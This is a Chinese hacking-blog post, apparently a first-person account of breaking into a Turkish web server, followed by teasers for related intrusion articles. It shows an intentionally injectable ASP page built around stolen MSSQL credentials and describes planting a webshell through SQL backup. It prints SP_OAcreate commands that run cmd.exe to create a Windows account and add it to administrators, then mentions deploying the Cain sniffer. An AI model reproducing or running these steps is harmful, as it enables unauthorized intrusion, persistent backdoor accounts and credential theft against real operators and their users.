入侵土耳其网站实例

所属分类: 网络安全 / 黑客入侵 阅读数: 227
收藏 0 赞 0 分享
打开SQL用查询分析器连上,发现了几个数据库估计是服务器的几个网站共用的这一个SQL server 于是立刻本地构造一个注射点,准备列目录。 构造注射点代码如下:
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=212.175.236.XXXX;UID=aXXXXX;pwd=XXXX;DATABASE=XXXX"
%>


我隐藏掉了真实的用户跟密码。。这里我说下怎么利用这个MSSQL的用户名和密码。首先我们构造一个有注射漏洞的文件sql.asp,代码如下:


<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from PE_GuestBook where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>



这里我们可以看到,直接用request("id") 取值没有过滤就构成了注入漏洞。我们在最前面加上,就是这个文件包含了conn.asp,把这两个文件放在同一目录下。这里我在本机架设放在WEB目录下,用啊D检测一下,地址为http://127.0.0.1/sql.asp?id=1。因为sql.asp明显有注射漏洞,再包含conn.asp,所以一检测1就有注射点了,如图1



PS:如果看过我以前文章的朋友肯定会觉的熟悉吧 ,因为这招我已经用过了,呵呵这里再写一次一个是为了自己复习下,一个也是为了给不会的朋友再说下。

既然是DB权限我们最常用的就是列目录然后备份获得WEBSHELL了吧?嘿嘿。找了半天终于在D:\Inetpub\sevi发现了网站的根目录,为了防止出错我还多试了几遍,确定是WEB目录后马上使用SQL备份之..这里语句我就不写了,上次渗透黑客风云的文章里写了很大的篇幅,不懂的朋友可以自己去看下,因为偶们直接用语句备份,所以成功的备份个小马上去 如图2 3







传上大马之后发现服务器竟然不支持中文..看起来很不舒服。不过能浏览一些盘,看了下WEB目录服务器上共有7。8个网站 都可以浏览,随便看了个站发现了一个SQL密码竟然跟我的是不一样的,于是重新用SQL连上,发现这回竟然是SA权限 如图4



但是在用xp_cmdshell存储过程执行命令的时候发现管理员把xplog70.dll给删掉了,我日。

但是没关系 偶们还有SP_OAcreate可以用 用SP_OAcreate一样可以执行系统命令

在查询分析器里执行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user godyhook hook /add'

就是利用SP_OAcreate来添加一个godyhook的系统用户 然后直接提升为管理员权限就OK了

提示命令完成成功 说明SP_OAcreate并没有被删除 如图5



但是连上终端的时候却提示我没有进入桌面的权限,着实郁闷了半天。后来好半天才想起来只是加了用户 但是并没有把

用户提升到管理员组,晕 真是大意

马上执行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net localgroup administratos godyhook /add'

然后再连一下 发现成功进入服务器鸟..看了下 网站有几个 哈哈 如图

然后上传一个cain到服务器上 准备开始偶们的sniffer 哈哈. 文章着实没什么技术含量 也就是普通的入侵日记。 本来还有几篇文章的因为杂志的原因暂时不能发出来 嘿嘿

总结:对于拿到MSSQL帐号找WEB目录,可以利用玫瑰渗透PCSHARE的方法,快速查找!








更多精彩内容其他人还在看

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享

传世木马盗号过程分析

玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木马盗号的原理(如果有那位大侠认为不够准确或是原理有所出入
收藏 0 赞 0 分享

浅析*NIX机器的入侵

目前来说*NIX机器早已经成为INTERNRT的主流服务器操作系统了,UNIX系列系统的优势相WINDOWS比较而言优势也是显而易见的。 而与之接口的脚本目前来说是以PHP MYSQL为主。当然也不乏大公司用JSP和CGI和PL,不过CGI和PL的处理相对比较困难一点,容易造
收藏 0 赞 0 分享

一次透过SNIFF有目的性的入侵

一次透过SNIFF有目的性的入侵 所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SNIFF 宿舍装了ADSL,我疯狂地在网上看电影和在QQ里泡MM(也可能是恐龙吧 :( )。网络入侵和安全方面的学习已经荒废了好一段时间
收藏 0 赞 0 分享

渗透日本服务器群

因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^ 开局: 入手点是一个注射点:sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。 以下是引用片段: down.vbs iLocal = LCase(WScript.Ar
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程2

遇阻:寻找VOD电影   首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。   可随后
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程1

最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路
收藏 0 赞 0 分享

入侵藏在防火墙后面的机子

事情是这样的: 遭遇一台湾的dns服务器,win2003 server 扫描器报告的开放端口:21,53,80 ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.
收藏 0 赞 0 分享

看清黑客穿透ADSL路由入侵内网

也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。 一.扫描 现在很多ADSL MODEM都是通过80、2
收藏 0 赞 0 分享
查看更多